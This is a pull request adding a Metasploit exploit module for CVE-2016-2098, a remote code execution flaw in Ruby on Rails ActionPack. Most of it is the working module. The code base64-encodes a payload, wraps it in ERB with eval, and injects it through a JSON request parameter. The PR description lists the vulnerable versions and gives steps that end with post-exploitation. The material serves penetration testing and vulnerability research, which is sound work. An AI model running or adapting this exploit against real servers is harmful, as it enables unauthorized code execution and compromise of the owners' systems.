### PR TITLE
Add basic module for CVE-2016-2098

### DIFF
--- a/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
+++ b/modules/exploits/multi/http/rails_actionpack_inline_exec.rb
@@ -1,0 +1,73 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ruby on Rails ActionPack Inline ERB Code Execution',
+      'Description'    => %q{
+          This module exploits a remote code execution vulnerability in the
+        inline request processor of the Ruby on Rails ActionPack component.
+        This vulnerability allows an attacker to process ERB to the inline
+        JSON processor, which is then rendered, permitting full RCE within
+        the runtime, without logging an error condition.
+
+      },
+      'Author'         =>
+        [
+          'RageLtMan <rageltman[at]sempervictus>'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'CVE', '2016-2098' ]
+        ],
+      'Platform'       => 'ruby',
+      'Arch'           => ARCH_RUBY,
+      'Privileged'     => false,
+      'Targets'        =>	[ ['Automatic', {} ] ],
+      'DisclosureDate' => 'Mar 1 2016',
+      'DefaultOptions' => {
+        "PrependFork" => true
+      },
+      'DefaultTarget' => 0))
+
+    register_options(
+      [
+        Opt::RPORT(80),
+        OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', "/"]),
+        OptString.new('TARGETPARAM', [ true, 'The target parameter to inject with inline code', 'id'])
+      ], self.class)
+
+  end
+
+  def json_request
+    code = Rex::Text.encode_base64(payload.encoded)
+    return {
+      datastore['TARGETPARAM'] => {"inline" => "<%= eval(%[#{code}].unpack(%[m0])[0]) %>"}
+    }.to_json
+  end
+
+  #
+  # Send the actual request
+  #
+  def exploit
+      send_request_cgi({
+        'uri'     => normalize_uri(target_uri.path),
+        'method'  => 'GET',
+        'ctype'   => 'application/json',
+        'headers' => {
+          'Accept' => 'application/json'
+        },
+        'data'    => json_request
+      }, 25)
+  end
+end


### PR DESCRIPTION
ActionPack versions prior to 3.2.22.2, 4.1.14.2, and 4.2.5.2
implement unsafe dynamic rendering of inline content such that
passing ERB wrapped Ruby code leads to remote execution.

This module only implements the Ruby payloads, but can easily
be extended to use system calls to execute native/alternate
payload types as well.

**Test Procedures:**
- [x] Clone https://github.com/hderms/dh-CVE_2016_2098
- [x] Run bundle install to match gem versions to those in lockfile
- [x] Run the rails server and configure the metasploit module:
- [x] Set TARGETURI to /exploits
- [x] Configure payload and handler options
- [x] Execute the module, move on to post-exp
